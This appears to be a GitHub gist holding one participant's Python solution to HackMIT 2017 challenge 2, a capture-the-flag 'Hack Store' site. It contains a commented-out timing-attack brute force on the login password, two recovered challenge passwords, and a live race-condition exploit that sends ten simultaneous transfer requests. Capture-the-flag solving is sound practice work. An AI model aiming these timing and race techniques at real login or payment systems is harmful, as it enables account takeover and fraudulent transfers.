Created
August 1, 2017 06:15
-
-
Save KaiCode2/28ca48ae685c0d172898df21139d33d9 to your computer and use it in GitHub Desktop.
The script I used to finish Hack Mit challenge 2. (Commented code is for part 1)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Script for breaking HackMIT challenge 2 | |
import requests | |
import threading | |
fail = ''' | |
<html> | |
<head> | |
<title>Hack Store</title> | |
<link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"> | |
<style type="text/css"> | |
body { | |
background-color: #252c37; | |
color: #ffffff; | |
font-family: 'Poppins'; | |
} | |
.blue { | |
color: #74d1ea; | |
} | |
.red { | |
color: #ff585d; | |
} | |
.container { | |
width: 700px; | |
margin: 0 auto; | |
text-align: center; | |
} | |
.fs { | |
text-align: right; | |
} | |
table { | |
margin-left: auto; | |
margin-right: auto; | |
} | |
a { | |
color: #74d1ea; | |
} | |
</style> | |
</head> | |
<body> | |
<div class="container"> | |
<h1><span class="red">HACK</span><span class="blue">Store</span></h1> | |
<p>Server UPGRADES: We now use brand new Pentium Pro Chips! This page loads faster than you can blink ;)</p> | |
<h2>Login</h2> | |
<div class="red"> | |
Bad Password<br /> | |
</div> | |
<!-- | |
STORE-1294: Your login speed could be improved by immediately terminating if a[i] != b[i] | |
Re: STORE-1294: fixed! | |
--> | |
<form method="POST" action="/u/KaiCode2/login"> | |
<table> | |
<tr> | |
<td class="fs">user</td> | |
<td> | |
<select name="username"> | |
<option value="marty_mcfly" selected>Marty McFly</option> | |
<option value="biff_tannen">Biff Tannen</option> | |
</select> | |
</td> | |
</tr> | |
<tr> | |
<td class="fs">password</td> | |
<td><input type="password" name="password" /></td> | |
</tr> | |
</table> | |
<input type="submit" value="Login" /> | |
</form> | |
</div> | |
</body> | |
</html> | |
''' | |
short = ''' | |
<html> | |
<head> | |
<title>Hack Store</title> | |
<link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"> | |
<style type="text/css"> | |
body { | |
background-color: #252c37; | |
color: #ffffff; | |
font-family: 'Poppins'; | |
} | |
.blue { | |
color: #74d1ea; | |
} | |
.red { | |
color: #ff585d; | |
} | |
.container { | |
width: 700px; | |
margin: 0 auto; | |
text-align: center; | |
} | |
.fs { | |
text-align: right; | |
} | |
table { | |
margin-left: auto; | |
margin-right: auto; | |
} | |
a { | |
color: #74d1ea; | |
} | |
</style> | |
</head> | |
<body> | |
<div class="container"> | |
<h1><span class="red">HACK</span><span class="blue">Store</span></h1> | |
<p>Server UPGRADES: We now use brand new Pentium Pro Chips! This page loads faster than you can blink ;)</p> | |
<h2>Login</h2> | |
<div class="red"> | |
Invalid Password (must be alphanumeric 6-12 characters)<br /> | |
</div> | |
<!-- | |
STORE-1294: Your login speed could be improved by immediately terminating if a[i] != b[i] | |
Re: STORE-1294: fixed! | |
--> | |
<form method="POST" action="/u/KaiCode2/login"> | |
<table> | |
<tr> | |
<td class="fs">user</td> | |
<td> | |
<select name="username"> | |
<option value="marty_mcfly" selected>Marty McFly</option> | |
<option value="biff_tannen">Biff Tannen</option> | |
</select> | |
</td> | |
</tr> | |
<tr> | |
<td class="fs">password</td> | |
<td><input type="password" name="password" /></td> | |
</tr> | |
</table> | |
<input type="submit" value="Login" /> | |
</form> | |
</div> | |
</body> | |
</html> | |
''' | |
person = 'biff_tannen' # 'marty_mcfly' | |
# post_fields = { 'username': person, 'password': 'abc123' } | |
# r = requests.post("https://store.delorean.codes/u/KaiCode2/login", data=post_fields) | |
# qsqNvfe0SE | |
# e6nlwtD5wN | |
# compound = '' | |
# greatest = 0.0 | |
# while r.text == fail or short and len(compound) <= 12: | |
# for char in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']: | |
# password = compound + char | |
# post_fields = { 'username': person, 'password': password } | |
# r = requests.post("https://store.delorean.codes/u/KaiCode2/login", data=post_fields) | |
# print(password) | |
# if float(r.headers['x-upstream-response-time']) > greatest: | |
# greatest = float(r.headers['x-upstream-response-time']) | |
# current = char | |
# if char == '9': | |
# compound += current | |
# greatest = 0.0 | |
# print(current) | |
# print(compound) | |
# print(compound) | |
post_fields = { 'username': person, 'password': 'qsqNvfe0SE' } | |
session = requests.session() | |
session.post("https://store.delorean.codes/u/KaiCode2/login", data=post_fields) | |
post_fields = { 'to': 'marty_mcfly' } | |
# session.post("https://store.delorean.codes/u/KaiCode2/transfer", data=post_fields) | |
# print(session.text) | |
def work(): | |
r = session.post("https://store.delorean.codes/u/KaiCode2/transfer", data=post_fields) | |
print(r.text) | |
threads = [] | |
for i in range(10): | |
t = threading.Thread(target=work) | |
threads.append(t) | |
t.start() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment